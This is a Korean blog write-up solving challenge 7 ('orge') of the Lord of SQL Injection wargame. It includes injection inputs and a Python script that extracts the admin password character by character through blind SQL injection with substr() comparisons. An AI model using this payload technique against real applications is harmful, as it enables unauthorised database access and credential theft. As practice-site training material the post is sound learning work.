[Lord of SQL Injection] 7번 orge

2021. 1. 21. 03:32·Write-Up/LOS (lord of sql injection)
반응형

blind sql injection이다

먼저 pw 길이를 알아내기 위하여 lenght함수를 사용하였다.

 

pw='||lenght(pw)8%23을 입력해 주었더니 hello admin을 볼 수 있었다.

import requests
 
cookies= {'PHPSESSID':'7a4pokemhooffbduohsbglc420'}
url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php?'
pw = ''
for i in range(1,9):
    for j in range(33,127):
        payload = "pw=' || id='admin' %26%26 substr(pw,1,"+str(i)+")='"+pw+chr(j)+"#"
        new_url = url+payload
        res = requests.get(new_url, cookies=cookies)
        res.raise_for_status()
        if "Hello admin" in res.text :
            pw += chr(j)
            print("pw: "+pw)
            break
        
print ("pw : "+pw)

반응형

'Write-Up > LOS (lord of sql injection)' 카테고리의 다른 글

[Lord of SQL Injection] 9번 vampire  (0) 2021.01.21
[Lord of SQL Injection] 8번 troll  (0) 2021.01.21
[Lord of SQL Injection] 6번 darkelf  (0) 2021.01.21
[Lord of SQL Injection] 5번 wolfman  (0) 2021.01.21
[Lord of SQL Injection] 4번 orc  (0) 2021.01.21
'Write-Up/LOS (lord of sql injection)' 카테고리의 다른 글
  • [Lord of SQL Injection] 9번 vampire
  • [Lord of SQL Injection] 8번 troll
  • [Lord of SQL Injection] 6번 darkelf
  • [Lord of SQL Injection] 5번 wolfman
Penguin Dev
Penguin Dev
What does the Penguin say?
    글쓰기 관리
  • Penguin Dev
    Pengha!
    Penguin Dev
  • 전체
    오늘
    어제
    • 분류 전체보기 (150)
      • Java & Spring (2)
      • System Hacking (4)
      • Algorithm (8)
        • Sorting algorithm (3)
      • Python (6)
      • DB (1)
      • Web (2)
        • Web Hacking & Security (2)
      • Write-Up (108)
        • pwnable.kr (17)
        • HackCTF (16)
        • 해커스쿨 FTZ (21)
        • LOB(lord of bufferoverflow) (19)
        • LOS (lord of sql injection) (28)
        • XSS-game (6)
        • Webhacking.kr (1)
      • SUA (19)
        • 오픈소스 보안 (19)
  • 블로그 메뉴

    • 홈
    • 태그
    • 방명록
  • 링크

  • 공지사항

  • 인기 글

  • 태그

    lord of bufferoverflow
    DB정리
    spring boot
    Hashtable
    LOB
    selection sort
    CountDownLatch
    HashMap
    tabat
    spring
    AtomicLong
    nop sled
    코드트리
    코딩테스트
    enumerate #list comprehension
    Lock
    hashmap vs concurrenthashmap
    Java
    코드트리조별과제
    sqlinjection
    Bubble Sort
    동시성
    putval()
    동시성처리
    시스템해킹
    ConcurrentHashMap
    concurrenthashmap vs hashmap
    thread-safe
  • 최근 댓글

  • 반응형
  • hELLO· Designed By정상우.v4.10.3
Penguin Dev
[Lord of SQL Injection] 7번 orge
상단으로

티스토리툴바